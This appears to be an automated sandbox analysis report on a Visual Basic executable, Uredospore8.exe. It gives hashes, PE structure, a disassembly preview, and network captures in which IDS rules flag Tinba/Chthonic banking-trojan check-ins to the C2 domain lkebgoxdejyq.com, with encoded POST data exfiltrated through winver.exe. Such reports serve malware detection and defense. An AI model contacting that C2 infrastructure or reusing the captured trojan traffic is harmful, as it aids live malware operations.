MD5:	E1C26F2047ED37A871FE95B2E1AB2F96
SHA1:	33C53F323DE75F445B2B5E1ECD9371247EE994A8
SHA-256:	3CD51E4DFD7495380EBF1337C3971F7BF349F9A6EAB2F472977BBCB048084E31
SHA-512:	3729D558BD5F75A997B8362BC74F93B82AF86575E3C6E4B60E20DC436B69A445F917CB7DF0DE87C7B43157B0C49774F297887A05139BA303A966C4EB59408369
Malicious:	false
Preview:	........\|.......h...."cmd"~........A%..aint~.........+r~........A,#A..A0..192~.........2016~........A3.A60A7.A[bAa,.b@..ck..db(.e...f'..g..h6..iq..j..AkG.l...m2..nL..o...p:..q..Ar_.s...t...u..Av.w...x...y..AzWB.RA..A.IC..UA......A.c..~........C.LA..C.(I..Cpre..run%~.........fetch%~.........ail~.........stsc~.........cmd~.........run~.........utlook~.........2-bit)~........Id.A ..~.........viewer~.........4-bit)~......... zip~........D-zip.Iz3A ..~........Ffile m..help~.........anager~.........fm~.........ip~........Aa..paint~.........int~.........omt~........CbouMAc.Ad.Ae..kype~........Al..mil~........An.Apa.rJ.As.At.Au..zure~.........t java~.........alc~........DcessS.ess~.........lc~.........md~.........on~.........robat~........G contro..s~.........~........Ol:wux:a.Occess c..ontrol~........Eapter%.b~........Ad"Cmin4Eobe a=Jva.F:wux:a..~.........dapter~........Fress b..~........Oook:wux.O:addres..s book~........E cmd:.Jis.Owux:adm..in cmd~........Otrative.. tools~........

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\ConstraintIndex\Apps_{aa33990c-54dd-4e13-9458-196cc03599c3}\Apps.index

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	data
Category:	dropped
Size (bytes):	1124551
Entropy (8bit):	6.149173837774368
Encrypted:	false
SSDEEP:	12288:MxmthXv3zrLoE1Bx7BefoQaWFxAm8DStxmthXv3zrLoE1Bx7BefoQaWFxAm8DSQi:AoLr7YfoyFxz8GfoLr7YfoyFxz8GHkK
MD5:	ECACA4F61EC9019648E50430157B11F4
SHA1:	143AEA7210B959053C3E4E26E442328B11D1E968
SHA-256:	892A22CDB211AB5A5327E3456D61E2BF2A66356C9A61F10D00ADD62B3A7B9CB8
SHA-512:	4C22C003D6CDEA5502736C43453AD4314696903A6B088BB43969068DFAA1FBE3C885CC74D4B9E2D489072EB70AC616AD5EBEEB5F4E65DF495BC300E8747E3B2C
Malicious:	false
Preview:	Ej..D..WindowsSearch....Apps...name..gscore..lscore...market.spelling.fE.h...K........~<~i..'..uT..r..7.c..l.s..P.x..c.k....p....'..CRa..Qn...a.,[.o2..t.u}.,{f.m.Q..e ;.w.0..l..(.y..P......gy..d.:&.i.;.[..n.b....j.z#.@.E.Q!..Q......N.Q/...`.z.Qh.7.f..+.4.. . ....v..L.8..Q6#.Q\..Qq.B.;.}..0....9...A5...X.Qz.H.7.'..%. .Q3.8.....Q21/...M.Q.kQ-..."""""""jo..&.I.Q+.uQ1j...j.a:..Ab...;b...Q...'.<...#?< ..a_C..b]<3../.<...Ae..t!...u...Qb...n....y._.Qj.{Ql =.p.S..m)o..k...Qo..Qh..Q;7CQi1..w2..Qf.2Qd8h.r....sE...a.<..cZ... \...z."..,me<ume.Q.z5Qxx.av>.Q[@R.24<u 24.ig...At.Qnv.Q .'Qo0xae....yo<uetoDam"...k<ue k.Qs.0ab..=&i<ue i+..j<ue jhQd..Qr..Qc.`&p<ue p...a<ue a.&w<ue w..&f<ue f..&h<ue h...v<ue v.Ql..&.<ube....g<ue g....<uetoet<uet..TUh<uet..&u<ueto..&p<ueto..%y<uet..cr<u...Re<...i<uetoMa<...-o<eto...o(...o(...teret...ute.eute..luetjuey...st ta..s<unes%e<unew..n<ueenfj<u....men+e n...t<uetbs<..X%j<uej...2<ue2M%b<ueb[.%g<ueg...h<ueh.%v<uev1.%c<uec..%p<uep6.%f<uef..j<uo...ue

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt (copy)

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	113991
Entropy (8bit):	5.179432690540701
Encrypted:	false
SSDEEP:	384:+/t8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ik/l:lGzoz5cdI9N/rim1vgY
MD5:	65427CDF9D90C0777F4CBD4F257664F3
SHA1:	4AAB0E1A336896C5EC225B823FE19291D2B24DDC
SHA-256:	2772443737DFF17F3FB08F649B4F66798B14F7063019037108474C2D7914E2EC
SHA-512:	BCACF4B0D6CE0CC57FA9D65EEBD174C20239C62850709A87DB2F4615ED46412E026016BA5F1077ACD2DBDE380684E10536024B1FD9C04C5DE743B421CDEDD93D
Malicious:	false
Preview:	[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":4,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340960432672E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

C:\Users\user\AppData\Local\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\LocalState\DeviceSearchCache\AppCache133694340288381827.txt.~tmp

Download File

Process:	C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	113991
Entropy (8bit):	5.179432690540701
Encrypted:	false
SSDEEP:	384:+/t8/n5LU/gT2/HA/Uc/jq/YI/Zk/Ey/eX/NV/CzS/1o/Yd/e4/YI/y+/jg/ik/l:lGzoz5cdI9N/rim1vgY
MD5:	65427CDF9D90C0777F4CBD4F257664F3
SHA1:	4AAB0E1A336896C5EC225B823FE19291D2B24DDC
SHA-256:	2772443737DFF17F3FB08F649B4F66798B14F7063019037108474C2D7914E2EC
SHA-512:	BCACF4B0D6CE0CC57FA9D65EEBD174C20239C62850709A87DB2F4615ED46412E026016BA5F1077ACD2DBDE380684E10536024B1FD9C04C5DE743B421CDEDD93D
Malicious:	false
Preview:	[{"System.FileExtension":{"Value":".exe","Type":12},"System.Software.ProductVersion":{"Value":"N/A","Type":12},"System.Kind":{"Value":"program","Type":12},"System.ParsingName":{"Value":"308046B0AF4A39CB","Type":12},"System.Software.TimesUsed":{"Value":4,"Type":5},"System.Tile.Background":{"Value":4280291898,"Type":5},"System.AppUserModel.PackageFullName":{"Value":"N/A","Type":12},"System.Identity":{"Value":"N/A","Type":12},"System.FileName":{"Value":"firefox","Type":12},"System.ConnectedSearch.JumpList":{"Value":"[]","Type":12},"System.ConnectedSearch.VoiceCommandExamples":{"Value":"[]","Type":12},"System.ItemType":{"Value":"Desktop","Type":12},"System.DateAccessed":{"Value":1.3340960432672E+17,"Type":14},"System.Tile.EncodedTargetPath":{"Value":"{6D809377-6AF0-444B-8957-A3773F02200E}\\Mozilla Firefox\\firefox.exe","Type":12},"System.Tile.SmallLogoPath":{"Value":"N/A","Type":12},"System.ItemNameDisplay":{"Value":"Firefox","Type":12}},{"System.FileExtension":{"Value":".exe","Type":12},"

C:\Users\user\AppData\Roaming\E6B93DA9\bin.exe

Download File

Process:	C:\Windows\SysWOW64\winver.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	69632
Entropy (8bit):	6.191747645410539
Encrypted:	false
SSDEEP:	768:FwaGd7Lw/nrrxDL/GOv2/w6HSa0fYSPNZsxRXQ1d2yg/QmWKHZyiVlaW4OHZ0Em:F47urp3v23HSa0AMNyfQ1d2y4Z4P
MD5:	73120A9C2658CFAB57CF191468A630A5
SHA1:	B6899957633E20BE9C303F72B324C0F24B094FA7
SHA-256:	23E1F8ACCFF194BCFDF90E4FC1AC6156BDDB5A72EE271333E88E988AFA5E09D7
SHA-512:	79FA3ABB8CAA14F3E22BF63CB523D469BFEB3D6BEFAABF517EFD6BEA9DAFB3A9398CB3E1A6024870B0A0A0D74E406A2006EE8A15AE37B06638E922E4DA39B2AA
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O...................D.....=.....Rich...........PE..L...0..S.....................@....................@.......................... ..............................................t...(.......@...................................................................(... ....................................text............................... ..`.data...(...........................@....rsrc...@........ ..................@..@l.[J............MSVBVM60.DLL....................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.191769179614653
TrID:	Win32 Executable (generic) a (10002005/4) 99.15% Win32 Executable Microsoft Visual Basic 6 (82127/2) 0.81% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	Uredospore8.exe
File size:	69'632 bytes
MD5:	50c7ce412d99eb4769411d6b60a34ac6
SHA1:	551d077916a61780fb055f6e3b27c0f2ba4d3378
SHA256:	446156cab04d4f29ecee92429d9cba29e4403be17b677e74cde58e39e6487f20
SHA512:	e763c3d8ea8bf58f466ff8ead43234b5d6bfacb5753437e34fe19ee1f808c7c454211866f4a676900330b0020feb08187f87e82edf804271fe5f4cf9abf8d5b0
SSDEEP:	768:1waGd7Lw/nrrxDL/GOv2/w6HSa0fYSPNZsxRXQ1d2yg/QmWKHZyiVlaW4OHZ0Em:147urp3v23HSa0AMNyfQ1d2y4Z4P
TLSH:	BF638E127FBD3C51DD490E7009BCA2F52317D631D680A93E2EC1CE2CA92E662AD7564F
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......O.......................D.......=.......Rich............PE..L...H..S.....................@....................@................

File Icon


Icon Hash:	a96dc95bc6cccdab

Static PE Info

General

Entrypoint:	0x401200
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
DLL Characteristics:
Time Stamp:	0x53AE9248 [Sat Jun 28 10:00:40 2014 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	4
OS Version Minor:	0
File Version Major:	4
File Version Minor:	0
Subsystem Version Major:	4
Subsystem Version Minor:	0
Import Hash:	f2f4496a54658e57a107c99e860a33f5

Entrypoint Preview

Instruction
push 004086B0h
call 00007EFDAC870575h
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
xor byte ptr [eax], al
add byte ptr [eax], al
cmp byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
jbe 00007EFDAC870573h
salc
push ebx
pop esp
and dl, byte ptr [ebp-608463BEh]
sub dword ptr [edx+0072B7BBh], edi
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], al
add byte ptr [ebp+02h], cl
nop
test al, 4Dh
add cl, byte ptr [ebp+61h]
je 00007EFDAC8705E7h
jc 00007EFDAC8705F0h
popad
add byte ptr [eax], al
add byte ptr [eax], al
add bh, bh
int3
xor dword ptr [eax], eax
or bl, byte ptr [ebx-0Fh]
pushfd
int 08h
rcl dword ptr [ebp+40h], 1
mov cl, 24h
adc dl, al
jno 00007EFDAC870533h
test dword ptr [ebx+0B2443A1h], ebx
xchg eax, esp
arpl word ptr [A01DE18Fh+eax*2], di
push ebx
test dword ptr [eax], ecx
sar byte ptr [edx], cl
dec edi
lodsd
xor ebx, dword ptr [ecx-48EE309Ah]
or al, 00h
stosb
add byte ptr [eax-2Dh], ah
xchg eax, ebx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
in eax, 73h
add byte ptr [eax], al
push ebp
add byte ptr [eax], al
add byte ptr [eax], al
or byte ptr [eax], al
dec ebp
imul ebp, dword ptr [esi+73h], 37726574h
add byte ptr [45000D01h], cl
jnc 00007EFDAC8705F6h
push 706F7465h
push 3165726Fh
add byte ptr [ecx], bl

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xd274	0x28	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x10000	0x1e40	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x228	0x20
IMAGE_DIRECTORY_ENTRY_IAT	0x1000	0xc4	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0xc600	0xd000	6a0f46d34b82952215f57c185fc79a17	False	0.5995342548076923	data	6.821035285186627	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.data	0xe000	0x1928	0x1000	620f0b67a91f7f74151bc5be745b7110	False	0.00634765625	data	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x10000	0x1e40	0x2000	284508f07ed7ddfa364c7e402c12a47c	False	0.466552734375	data	5.065203541650571	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0x11b58	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 512			0.581989247311828
RT_ICON	0x10cb0	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 2304			0.4997334754797441
RT_ICON	0x10408	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 1024			0.5712996389891697
RT_GROUP_ICON	0x103d8	0x30	data			1.0
RT_VERSION	0x10150	0x288	data	English	United States	0.48302469135802467

Imports

DLL

Import

MSVBVM60.DLL

__vbaR8FixI4, _CIcos, _adj_fptan, __vbaVarMove, __vbaFreeVar, __vbaFreeVarList, _adj_fdiv_m64, _adj_fprem1, __vbaSetSystemError, __vbaHresultCheckObj, _adj_fdiv_m32, _adj_fdiv_m16i, __vbaObjSetAddref, _adj_fdivr_m16i, _CIsin, __vbaChkstk, EVENT_SINK_AddRef, DllFunctionCall, _adj_fpatan, EVENT_SINK_Release, _CIsqrt, EVENT_SINK_QueryInterface, __vbaExceptHandler, _adj_fprem, _adj_fdivr_m64, __vbaFPException, __vbaI2Var, _CIlog, __vbaNew2, _adj_fdiv_m32i, _adj_fdivr_m32i, _adj_fdivr_m32, _adj_fdiv_r, __vbaVarDup, _CIatan, __vbaStrMove, _allmul, _CItan, _CIexp, __vbaFreeObj, __vbaFreeStr

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	Protocol	SID	Signature	Severity	Source Port	Dest Port	Source IP	Dest IP
2024-08-29T20:36:07.150947+0200	TCP	2020418	ET MALWARE Tinba Checkin 2	1	49711	80	192.168.2.6	216.218.185.162
2024-08-29T20:36:07.150947+0200	TCP	2024659	ET MALWARE [PTsecurity] Tinba Checkin 4	1	49711	80	192.168.2.6	216.218.185.162
2024-08-29T20:36:07.150947+0200	TCP	2830613	ETPRO MALWARE W32/Chthonic CnC Activity	1	49711	80	192.168.2.6	216.218.185.162

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 20:35:51.541784048 CEST	49674	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:35:51.541784048 CEST	49673	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:35:51.869877100 CEST	49672	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:01.150963068 CEST	49674	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:01.150963068 CEST	49673	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:01.479165077 CEST	49672	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:03.114073038 CEST	443	49704	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:03.114165068 CEST	49704	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:06.521184921 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:06.526144028 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:06.526221991 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:06.526557922 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:06.531558990 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:06.531614065 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:06.536485910 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:07.102843046 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:07.150947094 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:13.153968096 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:13.197829008 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:13.832392931 CEST	49704	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:13.832492113 CEST	49704	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:13.833065987 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:13.833127022 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:13.833199024 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:13.833847046 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:13.833862066 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:13.837481976 CEST	443	49704	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:13.837495089 CEST	443	49704	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.486270905 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.486448050 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.528474092 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.528508902 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.529674053 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.530596018 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.531780958 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.531842947 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.534868956 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.576517105 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.785063982 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.785136938 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:14.785161972 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:14.788446903 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:15.311660051 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:15.311691046 CEST	443	49715	173.222.162.64	192.168.2.6
Aug 29, 2024 20:36:15.311702967 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:15.311739922 CEST	49715	443	192.168.2.6	173.222.162.64
Aug 29, 2024 20:36:19.183778048 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:19.229094028 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:25.107918024 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:25.150980949 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:31.088577032 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:31.135370016 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:38.025063992 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:38.025738001 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:38.025779963 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:38.026087999 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:38.026127100 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:43.084404945 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:43.197915077 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:49.086046934 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:49.135442019 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:36:55.085777998 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:36:55.135415077 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:01.084641933 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:01.135392904 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:07.084382057 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:07.135467052 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:13.087568998 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:13.135442972 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:19.086931944 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:19.135432959 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:25.083966017 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:25.135421991 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:31.306216955 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:31.354214907 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:31.568331003 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:31.568506002 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:37.082889080 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:37.135616064 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:43.082828999 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:43.135446072 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:49.084316969 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:49.135499001 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:37:55.083853960 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:37:55.135519028 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:38:01.086370945 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:38:01.132920027 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:38:07.087347984 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:38:07.135453939 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:38:13.087505102 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:38:13.135463953 CEST	49711	80	192.168.2.6	216.218.185.162
Aug 29, 2024 20:38:13.506206036 CEST	80	49711	216.218.185.162	192.168.2.6
Aug 29, 2024 20:38:13.506257057 CEST	49711	80	192.168.2.6	216.218.185.162

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 29, 2024 20:36:06.088187933 CEST	56620	53	192.168.2.6	1.1.1.1
Aug 29, 2024 20:36:06.099069118 CEST	53	56620	1.1.1.1	192.168.2.6
Aug 29, 2024 20:36:06.107395887 CEST	52126	53	192.168.2.6	1.1.1.1
Aug 29, 2024 20:36:06.132410049 CEST	53	52126	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Aug 29, 2024 20:36:06.088187933 CEST	192.168.2.6	1.1.1.1	0x279d	Standard query (0)	www.google.com	A (IP address)	IN (0x0001)	false
Aug 29, 2024 20:36:06.107395887 CEST	192.168.2.6	1.1.1.1	0x201a	Standard query (0)	lkebgoxdejyq.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Aug 29, 2024 20:36:06.099069118 CEST	1.1.1.1	192.168.2.6	0x279d	No error (0)	www.google.com		142.250.186.68	A (IP address)	IN (0x0001)	false
Aug 29, 2024 20:36:06.132410049 CEST	1.1.1.1	192.168.2.6	0x201a	No error (0)	lkebgoxdejyq.com		216.218.185.162	A (IP address)	IN (0x0001)	false
Aug 29, 2024 20:36:12.891669035 CEST	1.1.1.1	192.168.2.6	0x8ed5	No error (0)	fp2e7a.wpc.2be4.phicdn.net	fp2e7a.wpc.phicdn.net		CNAME (Canonical name)	IN (0x0001)	false
Aug 29, 2024 20:36:12.891669035 CEST	1.1.1.1	192.168.2.6	0x8ed5	No error (0)	fp2e7a.wpc.phicdn.net		192.229.221.95	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

https:

www.bing.com

lkebgoxdejyq.com

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.6	49711	216.218.185.162	80	616	C:\Windows\SysWOW64\winver.exe

Timestamp	Bytes transferred	Direction	Data
Aug 29, 2024 20:36:06.526557922 CEST	96	OUT	POST /preview/ HTTP/1.0 Host: lkebgoxdejyq.com Content-Length: 157 Data Raw: 18 1a 83 d8 90 1d 83 d8 e8 5e 57 53 1e 18 82 fb 28 2a b3 e8 28 2a b3 ee Data Ascii: ^WS((
Aug 29, 2024 20:36:06.531614065 CEST	133	OUT	Data Raw: 00 80 00 00 00 07 de 9d 7f c6 87 88 87 5f f9 17 0c 0b 8a c6 ba 1e dd c4 02 7a 94 ce 2d 7a 46 4f ee 6b 40 be dc 0c 10 f4 84 dc 9a dd c4 f6 0d 3a 75 87 15 6b 48 b9 52 10 16 70 99 99 6b b7 ee 50 0a 5c 7c 9e 47 37 73 0c 4a 98 4a 92 0c 02 8e 9d 0e 27 Data Ascii: _z-zFOk@:ukHRpkP\\|G7sJJ'dF@]-}~O%@9F5N/_CI
Aug 29, 2024 20:36:07.102843046 CEST	138	IN	HTTP/1.1 200 OK Server: nginx/1.21.6 Date: Thu, 29 Aug 2024 18:36:07 GMT Content-Type: application/octet-stream Connection: close Data Raw: 68 Data Ascii: h
Aug 29, 2024 20:36:13.153968096 CEST	1	IN	Data Raw: 65 Data Ascii: e
Aug 29, 2024 20:36:19.183778048 CEST	1	IN	Data Raw: 6e Data Ascii: n
Aug 29, 2024 20:36:25.107918024 CEST	1	IN	Data Raw: 77 Data Ascii: w
Aug 29, 2024 20:36:31.088577032 CEST	1	IN	Data Raw: 50 Data Ascii: P
Aug 29, 2024 20:36:38.025063992 CEST	1	IN	Data Raw: 42 Data Ascii: B
Aug 29, 2024 20:36:38.025738001 CEST	1	IN	Data Raw: 42 Data Ascii: B
Aug 29, 2024 20:36:38.026087999 CEST	1	IN	Data Raw: 42 Data Ascii: B
Aug 29, 2024 20:36:43.084404945 CEST	1	IN	Data Raw: 50 Data Ascii: P
Aug 29, 2024 20:36:49.086046934 CEST	1	IN	Data Raw: 54 Data Ascii: T

HTTPS Proxied Packets

